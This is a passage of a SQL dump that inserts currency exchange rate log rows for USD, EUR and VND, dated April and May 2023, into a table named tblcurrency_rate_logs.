(3137, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-29'),
(3138, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-29'),
(3139, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-04-29'),
(3140, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3141, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-04-29'),
(3142, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3143, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-29'),
(3144, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-29'),
(3145, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-04-29'),
(3146, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3147, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-04-29'),
(3148, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3149, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-29'),
(3150, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-29'),
(3151, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-04-29'),
(3152, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3153, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-04-29'),
(3154, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3155, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-29'),
(3156, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-29'),
(3157, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-04-29'),
(3158, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3159, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-04-29'),
(3160, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3161, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-29'),
(3162, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-29'),
(3163, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-04-29'),
(3164, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3165, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-04-29'),
(3166, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3167, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-29'),
(3168, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-29'),
(3169, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-04-29'),
(3170, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3171, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-04-29'),
(3172, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3173, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-29'),
(3174, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-29'),
(3175, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-04-30'),
(3176, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3177, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-04-30'),
(3178, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3179, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-30'),
(3180, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-30'),
(3181, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-04-30'),
(3182, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3183, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-04-30'),
(3184, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3185, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-30'),
(3186, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-30'),
(3187, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-04-30'),
(3188, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3189, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-04-30'),
(3190, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3191, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-30'),
(3192, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-30'),
(3193, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-04-30'),
(3194, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3195, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-04-30'),
(3196, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3197, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-30'),
(3198, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-30'),
(3199, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-04-30'),
(3200, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3201, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-04-30'),
(3202, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3203, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-30'),
(3204, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-30'),
(3205, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-04-30'),
(3206, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3207, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-04-30'),
(3208, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3209, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-30'),
(3210, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-30'),
(3211, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-04-30'),
(3212, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3213, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-04-30'),
(3214, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3215, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-30'),
(3216, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-30'),
(3217, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-04-30'),
(3218, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3219, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-04-30'),
(3220, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-30'),
(3221, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-30'),
(3222, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-30'),
(3223, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-05-01'),
(3224, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3225, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-05-01'),
(3226, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3227, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-01'),
(3228, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-01'),
(3229, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-05-01'),
(3230, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3231, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-05-01'),
(3232, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3233, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-01'),
(3234, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-01'),
(3235, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-05-01'),
(3236, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3237, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-05-01'),
(3238, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3239, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-01'),
(3240, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-01'),
(3241, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-05-01'),
(3242, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3243, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-05-01'),
(3244, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3245, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-01'),
(3246, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-01'),
(3247, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-05-01'),
(3248, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3249, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-05-01'),
(3250, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3251, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-01'),
(3252, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-01'),
(3253, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-05-01'),
(3254, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3255, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-05-01'),
(3256, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3257, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-01'),
(3258, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-01'),
(3259, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-05-01'),
(3260, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3261, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-05-01'),
(3262, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3263, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-01'),
(3264, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-01'),
(3265, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-05-01'),
(3266, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3267, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-05-01'),
(3268, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-01'),
(3269, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-01'),
(3270, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-01'),
(3271, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-05-02'),
(3272, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3273, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-05-02'),
(3274, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3275, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-02'),
(3276, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-02'),
(3277, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-05-02'),
(3278, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3279, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-05-02'),
(3280, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3281, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-02'),
(3282, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-02'),
(3283, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-05-02'),
(3284, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3285, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-05-02'),
(3286, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3287, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-02'),
(3288, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-02'),
(3289, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-05-02'),
(3290, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3291, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-05-02'),
(3292, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3293, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-02'),
(3294, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-02'),
(3295, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-05-02'),
(3296, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3297, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-05-02'),
(3298, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3299, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-02'),
(3300, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-02'),
(3301, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-05-02'),
(3302, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3303, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-05-02'),
(3304, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3305, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-02'),
(3306, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-02'),
(3307, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-05-02'),
(3308, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3309, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-05-02'),
(3310, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3311, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-02'),
(3312, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-02'),
(3313, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-05-02'),
(3314, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3315, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-05-02'),
(3316, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-02'),
(3317, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-02'),
(3318, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-02'),
(3319, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-05-03'),
(3320, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3321, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-05-03'),
(3322, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3323, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-03'),
(3324, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-03'),
(3325, 1, 'USD', 0.000000, 2, 'EUR', 0.911990, '2023-05-03'),
(3326, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3327, 2, 'EUR', 0.000000, 1, 'USD', 1.096500, '2023-05-03'),
(3328, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3329, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-03'),
(3330, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-03'),
(3331, 1, 'USD', 1.000000, 2, 'EUR', 0.911990, '2023-05-03'),
(3332, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3333, 2, 'EUR', 1.000000, 1, 'USD', 1.096500, '2023-05-03'),
(3334, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3335, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-03'),
(3336, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-03'),
(3337, 1, 'USD', 0.000000, 2, 'EUR', 0.911990, '2023-05-03'),
(3338, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-03');
INSERT INTO `tblcurrency_rate_logs` (`id`, `from_currency_id`, `from_currency_name`, `from_currency_rate`, `to_currency_id`, `to_currency_name`, `to_currency_rate`, `date`) VALUES
(3339, 2, 'EUR', 0.000000, 1, 'USD', 1.096500, '2023-05-03'),
(3340, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3341, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-03'),
(3342, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-03'),
(3343, 1, 'USD', 1.000000, 2, 'EUR', 0.911990, '2023-05-03'),
(3344, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3345, 2, 'EUR', 1.000000, 1, 'USD', 1.096500, '2023-05-03'),
(3346, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3347, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-03'),
(3348, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-03'),
(3349, 1, 'USD', 0.000000, 2, 'EUR', 0.911990, '2023-05-03'),
(3350, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3351, 2, 'EUR', 0.000000, 1, 'USD', 1.096500, '2023-05-03'),
(3352, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3353, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-03'),
(3354, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-03'),
(3355, 1, 'USD', 1.000000, 2, 'EUR', 0.911990, '2023-05-03'),
(3356, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3357, 2, 'EUR', 1.000000, 1, 'USD', 1.096500, '2023-05-03'),
(3358, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3359, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-03'),
(3360, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-03'),
(3361, 1, 'USD', 0.000000, 2, 'EUR', 0.911990, '2023-05-03'),
(3362, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3363, 2, 'EUR', 0.000000, 1, 'USD', 1.096500, '2023-05-03'),
(3364, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-03'),
(3365, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-03'),
(3366, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-03'),
(3367, 1, 'USD', 1.000000, 2, 'EUR', 0.911990, '2023-05-04'),
(3368, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3369, 2, 'EUR', 1.000000, 1, 'USD', 1.096500, '2023-05-04'),
(3370, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3371, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-04'),
(3372, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-04'),
(3373, 1, 'USD', 0.000000, 2, 'EUR', 0.905550, '2023-05-04'),
(3374, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3375, 2, 'EUR', 0.000000, 1, 'USD', 1.104300, '2023-05-04'),
(3376, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3377, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-04'),
(3378, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-04'),
(3379, 1, 'USD', 1.000000, 2, 'EUR', 0.905550, '2023-05-04'),
(3380, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3381, 2, 'EUR', 1.000000, 1, 'USD', 1.104300, '2023-05-04'),
(3382, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3383, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-04'),
(3384, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-04'),
(3385, 1, 'USD', 0.000000, 2, 'EUR', 0.905550, '2023-05-04'),
(3386, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3387, 2, 'EUR', 0.000000, 1, 'USD', 1.104300, '2023-05-04'),
(3388, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3389, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-04'),
(3390, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-04'),
(3391, 1, 'USD', 1.000000, 2, 'EUR', 0.905550, '2023-05-04'),
(3392, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3393, 2, 'EUR', 1.000000, 1, 'USD', 1.104300, '2023-05-04'),
(3394, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3395, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-04'),
(3396, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-04'),
(3397, 1, 'USD', 0.000000, 2, 'EUR', 0.905550, '2023-05-04'),
(3398, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3399, 2, 'EUR', 0.000000, 1, 'USD', 1.104300, '2023-05-04'),
(3400, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3401, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-04'),
(3402, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-04'),
(3403, 1, 'USD', 1.000000, 2, 'EUR', 0.905550, '2023-05-04'),
(3404, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3405, 2, 'EUR', 1.000000, 1, 'USD', 1.104300, '2023-05-04'),
(3406, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3407, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-04'),
(3408, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-04'),
(3409, 1, 'USD', 0.000000, 2, 'EUR', 0.905550, '2023-05-04'),
(3410, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3411, 2, 'EUR', 0.000000, 1, 'USD', 1.104300, '2023-05-04'),
(3412, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-04'),
(3413, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-04'),
(3414, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-04'),
(3415, 1, 'USD', 1.000000, 2, 'EUR', 0.905550, '2023-05-05'),
(3416, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3417, 2, 'EUR', 1.000000, 1, 'USD', 1.104300, '2023-05-05'),
(3418, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3419, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-05'),
(3420, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-05'),
(3421, 1, 'USD', 0.000000, 2, 'EUR', 0.903020, '2023-05-05'),
(3422, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3423, 2, 'EUR', 0.000000, 1, 'USD', 1.107400, '2023-05-05'),
(3424, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3425, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-05'),
(3426, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-05'),
(3427, 1, 'USD', 1.000000, 2, 'EUR', 0.903020, '2023-05-05'),
(3428, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3429, 2, 'EUR', 1.000000, 1, 'USD', 1.107400, '2023-05-05'),
(3430, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3431, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-05'),
(3432, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-05'),
(3433, 1, 'USD', 0.000000, 2, 'EUR', 0.903020, '2023-05-05'),
(3434, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3435, 2, 'EUR', 0.000000, 1, 'USD', 1.107400, '2023-05-05'),
(3436, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3437, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-05'),
(3438, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-05'),
(3439, 1, 'USD', 1.000000, 2, 'EUR', 0.903020, '2023-05-05'),
(3440, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3441, 2, 'EUR', 1.000000, 1, 'USD', 1.107400, '2023-05-05'),
(3442, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3443, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-05'),
(3444, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-05'),
(3445, 1, 'USD', 0.000000, 2, 'EUR', 0.903020, '2023-05-05'),
(3446, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3447, 2, 'EUR', 0.000000, 1, 'USD', 1.107400, '2023-05-05'),
(3448, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3449, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-05'),
(3450, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-05'),
(3451, 1, 'USD', 1.000000, 2, 'EUR', 0.903020, '2023-05-05'),
(3452, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3453, 2, 'EUR', 1.000000, 1, 'USD', 1.107400, '2023-05-05'),
(3454, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3455, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-05'),
(3456, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-05'),
(3457, 1, 'USD', 0.000000, 2, 'EUR', 0.903020, '2023-05-05'),
(3458, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3459, 2, 'EUR', 0.000000, 1, 'USD', 1.107400, '2023-05-05'),
(3460, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-05'),
(3461, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-05'),
(3462, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-05'),
(3463, 1, 'USD', 1.000000, 2, 'EUR', 0.903020, '2023-05-06'),
(3464, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3465, 2, 'EUR', 1.000000, 1, 'USD', 1.107400, '2023-05-06'),
(3466, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3467, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-06'),
(3468, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-06'),
(3469, 1, 'USD', 0.000000, 2, 'EUR', 0.907940, '2023-05-06'),
(3470, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3471, 2, 'EUR', 0.000000, 1, 'USD', 1.101400, '2023-05-06'),
(3472, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3473, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-06'),
(3474, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-06'),
(3475, 1, 'USD', 1.000000, 2, 'EUR', 0.907940, '2023-05-06'),
(3476, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3477, 2, 'EUR', 1.000000, 1, 'USD', 1.101400, '2023-05-06'),
(3478, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3479, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-06'),
(3480, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-06'),
(3481, 1, 'USD', 0.000000, 2, 'EUR', 0.907940, '2023-05-06'),
(3482, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3483, 2, 'EUR', 0.000000, 1, 'USD', 1.101400, '2023-05-06'),
(3484, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-06'),
(3485, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-06'),
